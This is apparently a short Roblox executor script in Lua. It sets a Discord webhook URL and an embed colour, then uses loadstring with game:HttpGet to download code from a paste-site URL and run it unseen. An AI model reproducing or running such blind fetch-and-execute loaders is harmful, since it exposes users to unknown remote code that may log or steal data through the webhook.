--[[ ~~// Color Code (HEX) \\~~ RED = f54747 GREEN = 78ff78 BLUE = 4c6cfc PURPLE = b36bff YELLOW = fff27a PINK = ffa3e2 -- Don't Remove the "0x" on "getgenv().embedcolor" or it will not work!-- --]] getgenv().DiscordWebhook = "" -- Discord Webhook Here getgenv().embedcolor = "0xf54747" -- Embed Body Color (On left Side of the Embed, You can get HEX Code above ☝) --made it into opensourced so people can steal it loadstring(game:HttpGet("https://pst.klgrth.io/paste/e3d52/raw"))()